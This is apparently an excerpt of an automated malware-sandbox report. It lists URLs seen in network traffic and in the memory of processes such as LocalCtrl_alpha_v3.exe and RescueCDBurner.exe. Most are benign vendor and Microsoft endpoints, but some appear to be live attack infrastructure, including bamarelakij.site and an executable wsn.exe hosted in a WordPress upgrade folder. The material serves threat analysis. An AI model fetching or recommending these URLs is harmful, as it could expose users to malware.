https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx	false		high
https://sb.scorecardresearch.com/b2?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D	false	Avira URL Cloud: safe	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158922&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159160&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://chrome.cloudflare-dns.com/dns-query	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bamarelakij.site/95xk	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2107308227.000000000063A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGp	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2248438371.0000000008029000.00000004.00000001.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msnT	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2301405784.0000000002E32000.00000004.00000001.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bamarelakij.site:443r	LocalCtrl_alpha_v3.exe, 0000000A.00000002.2478776983.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com/co	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2300271592.0000000008027000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.it/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://xml.org/sax/features/namespace-prefixes	RescueCDBurner.exe, 00000003.00000002.1665955800.000000006E8F9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000003.1645395766.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1725814080.000000006D1D9000.00000002.00000001.01000000.00000014.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2301405784.0000000002E32000.00000004.00000001.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.biz/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com/download_api.php	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://bug.reneelab.com	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	false		high
http://qt.digia.com/	RescueCDBurner.exe, 00000004.00000002.1724425061.000000006BB6E000.00000002.00000001.01000000.00000017.sdmp	false		high
http://www.reneelab.ru/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://b.chenall.net/menu.lst	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://grub4dos.chenall.net/e/%u)	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.es/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com/X	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://e5.o.lencr.org0	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2301405784.0000000002E32000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2374923256.0000000002DAF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa	RescueCDBurner.exe, 00000003.00000002.1665955800.000000006E8F9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000003.1645395766.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1725814080.000000006D1D9000.00000002.00000001.01000000.00000014.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)	RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	false		high
https://avrupabaski.com/wp-content/upgrade/wsn.exe	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2374923256.0000000002DAF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.kr/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.jp/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2300271592.0000000008027000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.winimage.com/zLibDll1.2.6	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.net/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR31r5c&FrontEnd=AFD	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2300271592.0000000008027000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://qt.digia.com/product/licensing	RescueCDBurner.exe, 00000004.00000002.1724425061.000000006BB6E000.00000002.00000001.01000000.00000017.sdmp	false		high
http://trolltech.com/xml/features/report-start-end-entityUnknown	RescueCDBurner.exe, 00000003.00000002.1665955800.000000006E8F9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000003.1645395766.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1725814080.000000006D1D9000.00000002.00000001.01000000.00000014.sdmp	false		high
http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/reportcat=msn	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009B6F000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009EE3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.0000000005422000.00000004.00000800.00020000.00000000.sdmp	false		high
http://trolltech.com/xml/features/report-start-end-entity	RescueCDBurner.exe, 00000003.00000002.1665955800.000000006E8F9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000003.00000003.1645395766.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1725814080.000000006D1D9000.00000002.00000001.01000000.00000014.sdmp	false		high
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()	RescueCDBurner.exe, 00000003.00000002.1665622100.000000006CF79000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000004.00000002.1725993720.000000006D2A9000.00000002.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com.cn/passnow/passnow_	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://appsyndication.org/2006/appsyn	24EPV9vjc5.exe	false		high
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.comd	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://support.reneelab.com/anonymous_requests/new	RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.fr/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com.cn/download_api.php	RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1645684359.0000000002CBB000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://bamarelakij.site/	LocalCtrl_alpha_v3.exe, 0000000A.00000002.2478776983.000000000063A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2107308227.000000000063A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2467681465.000000000063A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2451220441.000000000063A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000002.2478229591.00000000005AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2325278197.000000000800D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site/han.html	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2469217060.0000000002E88000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.cc/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.de/	RescueCDBurner.exe, 00000003.00000001.1634075041.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1633348306.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1654228942.00000000004E4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1719317875.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1649763452.0000000000BA4000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=tX-Source-Length:	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2438917338.0000000002E35000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2456171699.0000000002E36000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 0000000A.00000003.2454753020.0000000002E35000.00000004.00000001.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	LocalCtrl_alpha_v3.exe, 0000000A.00000003.2375493665.000000000820D000.00000004.00000001.00020000.00000000.sdmp	false		high
